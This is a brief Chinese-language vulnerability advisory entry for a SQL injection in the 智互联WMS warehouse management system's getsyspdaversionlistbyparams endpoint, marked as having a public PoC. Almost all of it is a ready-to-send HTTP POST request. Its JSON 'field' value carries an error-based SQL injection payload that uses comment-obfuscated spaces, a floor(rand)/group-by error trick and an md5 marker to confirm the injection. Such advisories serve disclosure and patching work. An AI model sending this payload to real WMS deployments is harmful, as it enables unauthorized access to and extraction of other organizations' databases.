智互联WMS getsyspdaversionlistbyparams SQL注入漏洞

日期: 2025-10-14 | 影响软件: 智互联WMS | POC: 已公开

漏洞描述

智互联WMS getsyspdaversionlistbyparams SQL注入漏洞

PoC代码

POST /dapilc/restful/service/ilcwmsplus/ISysPdaVersionService/getsyspdaversionlistbyparams HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 223
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36

{"condition":{"field":"createDate,(select/**/5422/**/from(select/**/count(*),concat(0x7e,md5(573137),0x7e,floor(rand(0)*2))x/**/from/**/information_schema.plugins/**/group/**/by/**/x)a)","order":"asc"},"current":1,"size":1}